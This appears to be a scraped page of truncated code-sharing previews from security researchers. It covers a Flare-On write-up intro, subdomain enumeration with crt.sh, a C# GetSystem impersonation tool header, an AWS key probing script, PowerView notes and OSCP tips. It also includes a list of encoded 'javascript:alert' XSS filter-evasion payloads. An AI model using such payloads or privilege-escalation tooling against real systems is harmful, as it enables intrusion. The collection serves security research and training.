superfashi

Flare-On 12 Write-up

---

1 - Drill Baby Drill!

We are given a game written in Python. Once again, the source code is given because this is the first and easiest challenge, so let's dig into it directly.

hawktrace

using System;
using System.IO;
using System.Security.Cryptography;
using System.Runtime.Serialization.Formatters.Binary;

namespace hawktracewsus
{
    class Program
    {
        static void Main()

xiofee

// kernel32!GetProcAddress
// kernelbase!GetProcAddress
// ntdll!LdrGetProcedureAddressForCaller
// ntdll!LdrpResolveProcedureAddress
// ntdll!LdrpLoadForwardedDll
// ntdll!LdrpPreprocessDllName
// ntdll!LdrpApplyFileNameRedirection
// ntdll!ApiSetResolveToHost
// ntdll!ApiSetpSearchForApiSet
// ntdll!ApiSetpSearchForApiSetHost

IAmStoxe

 curl -s 'https://crt.sh/?q=%25.DOMAIN_NAME_HERE.com&output=json' \
    | jq -r '.[].name_value' \
    | sed 's/\*\.//g' \
    | sort -u \
    | xargs -L1 -I % sh -c './main --ignore-ssl --json="./tmp/%.json" --url="%"'

ignis-sec

{
	"30523382": {
		"className": "Proxy",
		"data": {
			"bypassFPForPAC": true,
			"color": "#f57575",
			"configUrl": "",
			"credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=",
			"cycle": false,
			"enabled": true,

hackerscrolls

<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()

<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)

mvelazc0

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;

//Based on https://0x00-0x00.github.io/research/2018/10/17/Windows-API-and-Impersonation-Part1.html
namespace GetSystem
{
    class Program
    {

colealtdelete

(Information rovided by @Mod Derek from Security Blue Team Discord from Daniel Durnea on the Offensive Security Facebook page - I am not the original author of this information)

How to prepare for OSCP complete guide

Below are 5 skills which you have to improve before registering for OSCP

• Learn basic of Computer Network, Web application, and Linux
• Learn Bash and Python scripting
• Enumeration is key in OSCP lab, I repeat Enumeration is key in OSCP Lab and in real world too
• Download vulnerable VM machines from vulnhub

fransr

#!/bin/bash

# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug
_timeout="20"
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"

HarmJ0y

# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set